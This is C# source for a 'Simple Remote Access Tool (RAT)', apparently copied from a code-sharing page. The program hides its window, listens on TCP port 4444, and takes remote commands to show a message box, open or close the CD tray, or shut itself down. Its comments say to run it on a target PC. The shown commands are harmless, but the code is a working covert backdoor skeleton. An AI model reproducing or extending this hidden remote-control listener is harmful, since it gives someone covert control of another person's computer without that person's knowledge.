📄 form1.cs
字号:
//
// Simple Remote Access Tool (RAT) in C# by Paul Chin
// as at Aug 8, 2007
//
using System;
using System.Collections.Generic;
using System.ComponentModel;
using System.Data;
using System.Drawing;
using System.Text;
using System.Windows.Forms;
using System.Net.Sockets;
using System.IO;
using System.Threading;
using System.Runtime.InteropServices; //for calling Win32 API to eject and close CD
using System.Net; //for IPAddress
//Run this Server on the Target PC and connect using Putty, Netcat or Telnet
namespace RatServer
{
public partial class Form1 : Form
{
#region Variable Declarations
//Commands from Client:
const string HELP = "0",
MESSAGE = "1",
EJECTCD = "2",
CLOSECD = "3",
SHUTDOWN = "9"; //Shutdown the Server process and port, not the PC
const string strHelp = "Command Menu:\r\n" +
"0 This Help\r\n" +
"1 Message\r\n" +
"2 Eject CD Tray\r\n" +
"3 Close CD Tray\r\n" +
"9 Shutdown the Server Process and Port\r\n";
TcpListener tcpListener;
//Use a separate thread for each command so that the
//server commands can run concurrently instead of blocking
Thread th_message,
th_ejectcd,
th_closecd;
Socket socketForClient;
NetworkStream networkStream;
StreamReader streamReader;
StreamWriter streamWriter;
#endregion
public Form1()
{
InitializeComponent();
}
private void Form1_Shown(object sender, EventArgs e)
{
this.Hide();
tcpListener = new TcpListener(System.Net.IPAddress.Any, 4444);
tcpListener.Start();
for(;;) RunServer(); //perpetually spawn socket until
//SHUTDOWN command is received
}
private void RunServer()
{
socketForClient = tcpListener.AcceptSocket();
networkStream = new NetworkStream(socketForClient);
streamReader = new StreamReader(networkStream);
streamWriter = new StreamWriter(networkStream);
//try...catch is used so that if client suddenly disconnects
//it will throw an exception which is caught by the catch{} block.
//In the catch{} block, the CleanUp() method closes all sockets
//so that they can be re-used.
//At this point, control returns to private void Form1_Shown() method
//where the for(;;) perpetual loop will call RunServer() again.
//To shutdown the server, the client sends the SHUTDOWN command coded
//as "9".
//Alternatively, the user can CTRL-ALT-DEL to use the Task Manager
//to kill it.
try
{
string line;
//Command loop, LastIndexOf is to search within the Network Stream
//for any command strings sent by the Client
while (true)
{
line = "";
line = streamReader.ReadLine();
if (line.LastIndexOf(HELP) >= 0)
{
streamWriter.Write(strHelp);
streamWriter.Flush();
}
if (line.LastIndexOf(MESSAGE) >= 0)
{
th_message = new Thread(new ThreadStart(MessageCommand));
th_message.Start();
}
if (line.LastIndexOf(EJECTCD) >= 0)
{
th_ejectcd = new Thread(new ThreadStart(EjectCD));
th_ejectcd.Start();
}
if (line.LastIndexOf(CLOSECD) >= 0)
{
th_closecd = new Thread(new ThreadStart(CloseCD));
th_closecd.Start();
}
if (line.LastIndexOf(SHUTDOWN) >= 0)
{
streamWriter.Flush();
CleanUp();
System.Environment.Exit(System.Environment.ExitCode);
}
}
}
catch (Exception err) //if Client suddenly disconnects
{
CleanUp();
}
}
private void CleanUp()
{
streamReader.Close();
networkStream.Close();
socketForClient.Close();
}
private void MessageCommand()
{
MessageBox.Show("Hello World","Greetings",MessageBoxButtons.OK);
}
//This is necessary to enable Win32 API calls to eject or close the CD tray
[DllImport("winmm.dll", EntryPoint = "mciSendStringA")]
public static extern void mciSendStringA(string lpstrCommand, string lpstrReturnString, Int32 uReturnLength, Int32 hwndCallback);
string rt = "";
private void EjectCD()
{
mciSendStringA("set CDAudio door open", rt, 127, 0);
}
private void CloseCD()
{
mciSendStringA("set CDAudio door closed", rt, 127, 0);
}
}
}
⌨️ 快捷键说明
复制代码
Ctrl + C
搜索代码
Ctrl + F
全屏模式
F11
切换主题
Ctrl + Shift + D
显示快捷键
?
增大字号
Ctrl + =
减小字号
Ctrl + -